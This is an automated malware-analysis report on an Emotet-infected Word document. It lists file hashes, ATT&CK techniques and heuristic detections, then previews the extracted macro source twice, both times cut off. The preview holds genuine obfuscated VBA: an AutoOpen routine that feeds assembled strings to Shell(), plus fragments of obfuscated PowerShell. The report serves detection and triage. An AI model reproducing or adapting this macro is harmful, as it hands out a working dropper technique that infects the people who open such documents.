Emotet Office (OLE) malware analysis — malicious · e1cf23f6d4a3b698

MALICIOUS

Office (OLE)

219.5 KB Created: 2018-06-29 08:13:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: e9a719612544bb6a972b835134fd9431 SHA-1: 68b0730b689bd83f4104b5f6dff9530784e17ee2 SHA-256: e1cf23f6d4a3b698b8006e349f25a85afc3ce4f1c6193de9d68ea0af64ddb7e8

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute external code. ClamAV detection confirms this as Emotet, a known downloader family. The macro's obfuscated nature and use of Shell() strongly suggest it downloads and executes a second-stage payload.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6962911-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6962911-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13997 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13997 bytes
SHA-256: `fe128fe82e08bae5fc39b84216a5182d1fbc3ea3361f10525c4ffd42ee1a054d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "qGkznBWcFH" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "VHHmdGkkhzi" Function EIjFNzNt() On Error Resume Next zLDuD = wDjvNz = 10463 / iNkMP + 72595 / ChrW(12804) / YmwIa + ChrW(wOHnw) * 27888 + ChrB(83966 * CInt(rBITwZ) * 11256 - Hex(jjuoHZ)) + cZJMin - Int(wuGpH) * (nazqV - ViEwoh) oFQNl = XQfNoB - zbDNM / (RlwGj + Oct(TPDOX) - 57354 + Log(fRzKh)) ZbmVRY = bpZdtPARId + Chr(nLCSqbHL + vbKeyP + wlPAZ) + "owe" + "rs" UrkDIM = pIttf = 81722 / hPbrzj + 19117 / ChrW(34987) / TBHjSW + ChrW(ARVjsP) * 63026 + ChrB(65189 * CInt(uVOKWJ) * 68684 - Hex(unPpHL)) + WCIRBB - Int(sSMscJ) * (qSjtE - OvHMK) ZpfHG = FXKqHP - mScwwd / (aXEVjv + Oct(Gjbvv) - 13777 + Log(bnNLGA)) mzAKT = SmlzJ = 68019 / rBlKaK + 80044 / ChrW(98883) / ivLIwK + ChrW(PkrdJn) * 47056 + ChrB(6660 * CInt(MhlTz) * 55163 - Hex(MdrZBC)) + vKXwRF - Int(LRHHWO) * (GTEdh - OcEfpF) ziEkd = zwSmp - zMBQd / (bOVGK + Oct(wUDWTF) - 84599 + Log(LwwjM)) EIjFNzNt = UsIZYUbtMq + ZbmVRY + kNGTizQiOR + oBzHi + zZPFA iJOUn = OWjnMM = 52503 / NrntU + 32828 / ChrW(76214) / IddMu + ChrW(vBNUDF) * 64714 + ChrB(34755 * CInt(AScYak) * 32214 - Hex(GiYuU)) + FLvkV - Int(krani) * (iZrIVl - rnarsN) sUWiV = bsHIIV - ROIsp / (ABqRwI + Oct(zcUiUD) - 44151 + Log(IQVsRz)) End Function Sub AutoOpen() On Error Resume Next pRiAAZ = dfiCCM = 43813 / CXZim + 99373 / ChrW(45922) / oEwOIw + ChrW(zXsCLY) * 66576 + ChrB(96767 * CInt(NUzpv) * 34238 - Hex(KaHOz)) + jLwRo - Int(vBKWfr) * (iJKKcU - QURAi) WEooAj = johDuk - DHCwUz / (nrzPf + Oct(XCOtwj) - 11658 + Log(rNWVv)) Application.Run "VjpHRwka", EIjFNzNt CqcHQ = fWJSTj = 70320 / jMoYV + 80529 / ChrW(35652) / ZnFKiR + ChrW(ujdYv) * 19372 + ChrB(94050 * CInt(swnOB) * 88063 - Hex(aRzkni)) + zzFjY - Int(oBGNO) * (PmqHo - mzvai) RjdNnL = dhVidT - ljars / (AqiJjJ + Oct(YAjcX) - 33072 + Log(RomaNv)) End Sub Function VjpHRwka(iIGlKNGT) On Error Resume Next kctDM = baGXEh = 15532 / aFUdiA + 41498 / ChrW(56874) / sKMpv + ChrW(uzdzHQ) * 26228 + ChrB(70897 * CInt(WViwu) * 18071 - Hex(pJCqj)) + wjuzG - Int(BsAwjd) * (XbkAL - UOHIS) jrTVD = EMcDuD - JljMW / (BUilz + Oct(IrdPD) - 80215 + Log(caXkhX)) LcRjUj = rBblBk = 72331 / CBFWP + 90478 / ChrW(90408) / zYNTaj + ChrW(BBpZLZ) * 6498 + ChrB(96444 * CInt(QYRqC) * 58335 - Hex(FpLXV)) + LICQCT - Int(GNGHP) * (jMKarz - nFrdE) TWIiO = QWqjX - WjmKDR / (abupu + Oct(UXSqF) - 32605 + Log(LdApw)) RqcNGY = zfoiZAH + Shell(lXOLOH + iIGlKNGT + VQDSjuzIOjY, 628646070 - 628646070) + QRiXEp rvzEtf = fUPQdC = 49242 / iwYjN + 30239 / ChrW(88389) / zflPzi + ChrW(jzLUaO) * 53063 + ChrB(45173 * CInt(KHjAI) * 3782 - Hex(CrDhh)) + IlSzGB - Int(IPnwa) * (SRhzGC - WWGjt) vRiYvB = HoaBc - awtuT / (ZbiwVr + Oct(fHFmim) - 8699 + Log(FHZrsv)) End Function Function kNGTizQiOR() On Error Resume Next AuLzs = aaABc = 90360 / ZFlHM + 12114 / ChrW(63817) / DKnPN + ChrW(zDPoz) * 710 + ChrB(85188 * CInt(uvAzo) * 58167 - Hex(miKnh)) + mcjkZ - Int(wzjXi) * (GaWlMc - RYLqHN) CkQbd = jzNbjE - swEKXS / (hDzBW + Oct(sPiblZ) - 44750 + Log(ELjHu)) GGsJBn = "hell " + Chr(34) + " $" + Chr(40) + " sV" + " 'OFS' " + " ''" + Chr(41) + Chr(34) + " " + Chr(43) + "[s" + "TrinG]" + Chr(40) + " " + "'41T" wJNuB = CBVUA = 36543 / skzkOF + 92005 / ChrW(68063) / SlpJh + ChrW(okXCc) * 23595 + ChrB(42109 * CInt(qFzNi) * 82589 - Hex(KaSkiW)) + aRCwW - Int(rbFsbj) * (kwwqc - NJfOs) sWHKW = CziJG - ipnfO / (HmvdJ + Oct(ccIII) - 93009 + Log(CKhiLk)) tGiBOoDW = "122-69" + "-89X" + "48X99p" + "104o12" + "2X32X9" + "8s111-10" iTZmf = pwLmih = 89840 / HFVPNs + 66872 / ChrW(88364) / tomOD + ChrW(wLcuzR) * 76393 + ChrB(25031 * CInt(zhYdQ) * 40790 - Hex(aBPvE)) + Ozsio - Int(fwsMm) * (PbGmz - TsMRf) EcvTN = wImjwi - PdkhL / (VmWBt + Oct(nECbL) - 950 + Log(RYdLHM)) tqrQVVa = "3-10" + "4-110p121" + "s45p6" + "7-104o" + "121-3" + "5T90p104" + "p111p78-" IOdVfi = kikjLA = 23565 / jibBA + 48780 / ChrW( ... (truncated)

SHA-256: fe128fe82e08bae5fc39b84216a5182d1fbc3ea3361f10525c4ffd42ee1a054d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "qGkznBWcFH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VHHmdGkkhzi"
Function EIjFNzNt()
On Error Resume Next
zLDuD = wDjvNz = 10463 / iNkMP + 72595 / ChrW(12804) / YmwIa + ChrW(wOHnw) * 27888 + ChrB(83966 * CInt(rBITwZ) * 11256 - Hex(jjuoHZ)) + cZJMin - Int(wuGpH) * (nazqV - ViEwoh)
oFQNl = XQfNoB - zbDNM / (RlwGj + Oct(TPDOX) - 57354 + Log(fRzKh))
ZbmVRY = bpZdtPARId + Chr(nLCSqbHL + vbKeyP + wlPAZ) + "owe" + "rs"
UrkDIM = pIttf = 81722 / hPbrzj + 19117 / ChrW(34987) / TBHjSW + ChrW(ARVjsP) * 63026 + ChrB(65189 * CInt(uVOKWJ) * 68684 - Hex(unPpHL)) + WCIRBB - Int(sSMscJ) * (qSjtE - OvHMK)
ZpfHG = FXKqHP - mScwwd / (aXEVjv + Oct(Gjbvv) - 13777 + Log(bnNLGA))
mzAKT = SmlzJ = 68019 / rBlKaK + 80044 / ChrW(98883) / ivLIwK + ChrW(PkrdJn) * 47056 + ChrB(6660 * CInt(MhlTz) * 55163 - Hex(MdrZBC)) + vKXwRF - Int(LRHHWO) * (GTEdh - OcEfpF)
ziEkd = zwSmp - zMBQd / (bOVGK + Oct(wUDWTF) - 84599 + Log(LwwjM))
EIjFNzNt = UsIZYUbtMq + ZbmVRY + kNGTizQiOR + oBzHi + zZPFA
iJOUn = OWjnMM = 52503 / NrntU + 32828 / ChrW(76214) / IddMu + ChrW(vBNUDF) * 64714 + ChrB(34755 * CInt(AScYak) * 32214 - Hex(GiYuU)) + FLvkV - Int(krani) * (iZrIVl - rnarsN)
sUWiV = bsHIIV - ROIsp / (ABqRwI + Oct(zcUiUD) - 44151 + Log(IQVsRz))
End Function
Sub AutoOpen()
On Error Resume Next
pRiAAZ = dfiCCM = 43813 / CXZim + 99373 / ChrW(45922) / oEwOIw + ChrW(zXsCLY) * 66576 + ChrB(96767 * CInt(NUzpv) * 34238 - Hex(KaHOz)) + jLwRo - Int(vBKWfr) * (iJKKcU - QURAi)
WEooAj = johDuk - DHCwUz / (nrzPf + Oct(XCOtwj) - 11658 + Log(rNWVv))
Application.Run "VjpHRwka", EIjFNzNt
CqcHQ = fWJSTj = 70320 / jMoYV + 80529 / ChrW(35652) / ZnFKiR + ChrW(ujdYv) * 19372 + ChrB(94050 * CInt(swnOB) * 88063 - Hex(aRzkni)) + zzFjY - Int(oBGNO) * (PmqHo - mzvai)
RjdNnL = dhVidT - ljars / (AqiJjJ + Oct(YAjcX) - 33072 + Log(RomaNv))
End Sub
Function VjpHRwka(iIGlKNGT)
On Error Resume Next
kctDM = baGXEh = 15532 / aFUdiA + 41498 / ChrW(56874) / sKMpv + ChrW(uzdzHQ) * 26228 + ChrB(70897 * CInt(WViwu) * 18071 - Hex(pJCqj)) + wjuzG - Int(BsAwjd) * (XbkAL - UOHIS)
jrTVD = EMcDuD - JljMW / (BUilz + Oct(IrdPD) - 80215 + Log(caXkhX))
LcRjUj = rBblBk = 72331 / CBFWP + 90478 / ChrW(90408) / zYNTaj + ChrW(BBpZLZ) * 6498 + ChrB(96444 * CInt(QYRqC) * 58335 - Hex(FpLXV)) + LICQCT - Int(GNGHP) * (jMKarz - nFrdE)
TWIiO = QWqjX - WjmKDR / (abupu + Oct(UXSqF) - 32605 + Log(LdApw))
RqcNGY = zfoiZAH + Shell(lXOLOH + iIGlKNGT + VQDSjuzIOjY, 628646070 - 628646070) + QRiXEp
rvzEtf = fUPQdC = 49242 / iwYjN + 30239 / ChrW(88389) / zflPzi + ChrW(jzLUaO) * 53063 + ChrB(45173 * CInt(KHjAI) * 3782 - Hex(CrDhh)) + IlSzGB - Int(IPnwa) * (SRhzGC - WWGjt)
vRiYvB = HoaBc - awtuT / (ZbiwVr + Oct(fHFmim) - 8699 + Log(FHZrsv))
End Function

Function kNGTizQiOR()
On Error Resume Next
AuLzs = aaABc = 90360 / ZFlHM + 12114 / ChrW(63817) / DKnPN + ChrW(zDPoz) * 710 + ChrB(85188 * CInt(uvAzo) * 58167 - Hex(miKnh)) + mcjkZ - Int(wzjXi) * (GaWlMc - RYLqHN)
CkQbd = jzNbjE - swEKXS / (hDzBW + Oct(sPiblZ) - 44750 + Log(ELjHu))
GGsJBn = "hell  " + Chr(34) + " $" + Chr(40) + " sV" + " 'OFS' " + " ''" + Chr(41) + Chr(34) + " " + Chr(43) + "[s" + "TrinG]" + Chr(40) + " " + "'41T"
wJNuB = CBVUA = 36543 / skzkOF + 92005 / ChrW(68063) / SlpJh + ChrW(okXCc) * 23595 + ChrB(42109 * CInt(qFzNi) * 82589 - Hex(KaSkiW)) + aRCwW - Int(rbFsbj) * (kwwqc - NJfOs)
sWHKW = CziJG - ipnfO / (HmvdJ + Oct(ccIII) - 93009 + Log(CKhiLk))
tGiBOoDW = "122-69" + "-89X" + "48X99p" + "104o12" + "2X32X9" + "8s111-10"
iTZmf = pwLmih = 89840 / HFVPNs + 66872 / ChrW(88364) / tomOD + ChrW(wLcuzR) * 76393 + ChrB(25031 * CInt(zhYdQ) * 40790 - Hex(aBPvE)) + Ozsio - Int(fwsMm) * (PbGmz - TsMRf)
EcvTN = wImjwi - PdkhL / (VmWBt + Oct(nECbL) - 950 + Log(RYdLHM))
tqrQVVa = "3-10" + "4-110p121" + "s45p6" + "7-104o" + "121-3" + "5T90p104" + "p111p78-"
IOdVfi = kikjLA = 23565 / jibBA + 48780 / ChrW(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.